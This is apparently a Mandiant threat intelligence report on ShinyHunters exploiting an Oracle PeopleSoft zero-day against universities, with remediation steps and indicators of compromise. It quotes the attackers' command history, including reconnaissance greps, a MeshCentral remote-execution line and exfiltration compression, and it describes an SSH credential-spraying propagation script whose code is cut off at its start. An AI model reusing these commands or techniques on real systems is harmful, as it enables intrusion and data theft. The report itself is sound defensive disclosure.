- The threat actor ShinyHunters is exploiting CVE-2026-35273, a critical remote code execution vulnerability (CVSS 9.8) in the Oracle PeopleSoft Environment Management component, to compromise systems and deploy malware for lateral movement and data theft. The article does not specify affected or fixed version numbers. As an immediate workaround, organizations should disable the Environment Management Hub service or block external access to the /PSEMHUB/* and /PSIGW/HttpListeningConnector endpoints as advised by Oracle.
Threat Intelligence ShinyHunters Targets Education Sector with Oracle PeopleSoft Exploit June 11, 2026 Mandiant Introduction Mandiant and Google Threat Intelligence Group (GTIG) have identified an active compromise and extortion campaign attributed to UNC6240 (ShinyHunters) targeting Oracle PeopleSoft application infrastructure. The activity was observed between May 27, 2026, and June 9, 2026 and is consistent with the exploitation of CVE-2026-35273 , a critical remote code execution vulnerability (CVSS 9.8) in the Environment Management component. The exploitation of this vulnerability directly aligns with the observed targeting of Environment Management Hub (PSEMHUB) endpoints. Because this activity predates Oracle's June 10, 2026 advisory, the vulnerability was exploited as a zero-day. Upon becoming aware of active scanning and exploitation, we initiated notifications to over 100 global organizations whose IP addresses correlated with potentially vulnerable endpoints. Most of these organizations were based in the United States, and 68 percent operated within the higher education sector. Subsequently, public reports by @nahamike01 on X highlighted open attacker directories on the staging servers, allowing GTIG to perform a detailed triage of the threat actor's operations. The attacker staging environments hosted customized MeshCentral agents masquerading as legitimate cloud endpoints, which they used to run administrative command queries and deploy a custom lateral movement and defacement script, [victim_abbreviation]_fanout.sh . This campaign directly correlates with subsequent data leaks of stolen organization data published on the ShinyHunters Data Leak Site (DLS) on June 9, 2026. We recommend that organizations running Oracle PeopleSoft take the following immediate actions to best defend themselves. Additional remediation and hardening guidance is included later in this post. Remediation and Hardening Quick Guide Disable the Environment Management Hub (EMHub) Service in Multi-Server configurations or completely remove the PSEMHUB application in Single-Server configurations, as advised by Oracle's security alert guidance. If you cannot disable the EMHub Service, block external access to /PSEMHUB/* and /PSIGW/HttpListeningConnector at the network perimeter or firewall level. Check the PIA WebLogic access log for POST /PSEMHUB/hub and POST /PSIGW/HttpListeningConnector originating from external source IPs. Check the web-tier filesystem for compromise indicators, specifically any .jsp files under /webserv//applications/peoplesoft/PSEMHUB.war/ that are not part of the shipped product. Review the filesystem for any files or directories under /PSEMHUB.war/envmetadata/transactions/ as well as unexpected directories named logs , persistantstorage , or scratchpad under the PSEMHUB paths. Monitor outbound firewall logs and NetFlow data for outbound SMB traffic originating from PeopleSoft servers to untrusted external destinations. Threat Detail & Campaign Overview On June 9 2026, public threat reports highlighted open attacker directories. GTIG triaged five sequential IP addresses: 142.11.200.186 , 142.11.200.187 , 142.11.200.188 , 142.11.200.189 , and 142.11.200.190 . These systems were hosting Python SimpleHTTP servers on port 8888, exposing directory contents that included staging materials, customized agents, and attacker command histories. The staging infrastructure hosted pre-configured Windows MeshCentral agent binaries disguised as Microsoft Azure services, specifically named meshagent32-azure-ops.exe , meshagent64-azure-ops.exe , and meshagent64-v2.exe . MeshCentral is an open-source remote management server; its agent is software that runs on remote devices to allow for remote management across various operating systems, including Windows, Linux, macOS, and FreeBSD. Static analysis indicates these agents were hardcoded to establish communication with the command and control (C2) server wss://azurenetfiles.net:443/agent.ashx . The domain azurenetfiles.net was chosen to mimic legitimate Microsoft Azure NetApp Files endpoints, a common masquerading tactic. An unconfigured Linux meshagent binary was also staged, suggesting that the threat actors passed parameters dynamically via the command line during deployment. Global Notification Response Campaign Prior to the discovery of the open staging directories, we began an effort to alert over 100 exposed organizations to assist in restricting access to vulnerable endpoints. These organizations are significantly concentrated in the Higher Education sector; 68 percent are academic institutions, including universities and colleges worldwide. While several organizations successfully blocked the activity or remediated the vulnerabilities, others experienced compromise, resulting in stolen data being published on the ShinyHunters DLS. Technical Analysis & Command History The exposed .bash_history file , which was identical across all five staging hosts, outlines the server configuration and administrative actions. The technical narrative begins with the configuration of the staging environment. On May 27, 2026, at 22:14 UTC, the attackers installed the MeshCentral remote management server (version 1.1.59) to establish their C2 staging environment. Shortly after, at 22:25 UTC, they installed the acme-client npm package to automate the provisioning of Let's Encrypt SSL certificates for the masquerading domain " azurenetfiles.net ". The attackers interacted with compromised systems using the MeshCentral command-line interface utility meshctrl.js . The command history shows the threat actors performing targeted reconnaissance within compromised internal networks. They mapped Oracle PeopleSoft configurations by inspecting mount points, checking the process scheduler configuration file psappsrv.cfg , and reading WebLogic server XML configurations ( config.xml ) . The session log ends with the attackers establishing an outbound SSH connection from their staging system to 176.120.22.24 , which hosts the public clearnet mirror of the ShinyHunters DLS . An analysis of the exposed command history reveals the key administrative and malicious operations performed by the threat actors on the staging servers (timestamps were not available in every case): 1. Staging Infrastructure Setup: May 27, 2026, 22:14 UTC: Installed MeshCentral (v1.1.59) and 22:25 UTC: Installed "acme-client" to establish the C2 staging environment and automate SSL certificate provisioning for azurenetfiles.net . Staged the compiled Windows agent binaries ( meshagent32-azure-ops.exe , etc.) designed to communicate back to the C2 address: wss://azurenetfiles.net:443/agent.ashx . May 29, 2026, 18:46 UTC: The attackers checked for the availability of the "authenticode" tool on the staging system using the command npm list global authenticode . This command would return any npm package with a name starting in 'authenticode', such as authenticode-sign , used for signing binaries, or authenticode , used for examining metadata on a file. 2. Targeted Internal Reconnaissance: Leveraged the MeshCentral CLI utility meshctrl.js to execute administrative command queries on compromised remote endpoints: hostname; id . Mapped Oracle PeopleSoft system configurations by inspecting the process scheduler configuration file ( psappsrv.cfg ) to extract machine names and IP addresses: grep -hE '\''^[[:space:]]*Address=|^[[:space:]]*HostName='\'' /u01/app/psoft/ps_config_homes/csprd/appserv/prcs/psappsrv.cfg 2>/dev/null | head -80 Audited network configurations and active mounts on compromised hosts: mount | grep -E "psoft|ps_config|nfs" . Mapped internal subnet hosts by querying local hosts tables: cat /etc/hosts | grep -E "[redacted_victim_string]" . Inspected WebLogic XML configurations ( config.xml ) to map internal application servers. 3. Lateral Movement & Script Propagation: Wrote the lateral propagation script [victim_abbreviation]_fanout.sh via a heredoc to /tmp on the staging host. Triggered the execution of the propagation script on compromised hosts using the MeshCentral command execution feature : node meshctrl.js RunCommand --loginuser admin --loginpass '[password]' --id '[agent_id]' --run 'bash /tmp/[victim_abbreviation]_fanout.sh' Verified propagation success by running remote checks for the defacement marker file README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT . 4. Exfiltration & DLS Connection: Compressed exfiltrated directories containing stolen data using zstd : pv -s "$(du -sb exfil | awk '{print $1}')" | zstd -3 -T0 -o exfil.tar.zst Concluded operations by establishing an outbound SSH connection from the staging host to 176.120.22.24 , the IP address hosting the public mirror of the ShinyHunters Data Leak Site. Figure 1: ShinyHunters DLS Post showing Peoplesoft victim added June 9, 2026 Propagation Script & Lateral Movement As observed in the .bash_history log, the threat actors wrote a propagation script named [victim_abbreviation]_fanout.sh directly to the /tmp directory of the compromised system. This script automates SSH credential spraying against internal hosts by parsing hostnames from the local /etc/hosts file matching a specific naming pattern. The script attempts authentication using a hardcoded list of common administrative and application-specific usernames and passwords. Upon establishing a successful SSH session, the script copies a defacement and extortion marker file named README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT into the WebLogic and Process Scheduler directories. This staging and deployment activity directly correlates with the publication of stolen archives on the ShinyHunters DLS on June 9, 2026. The redacted contents of the propagation script [victim_abbreviation]_fanout.sh are as follows : set +e SRC="/u01/app/psoft/ps_config_homes/csprd/webserv/CSPRD02/README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT" NAME="README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT" BASE="/u01/app/psoft/ps_config_homes/csp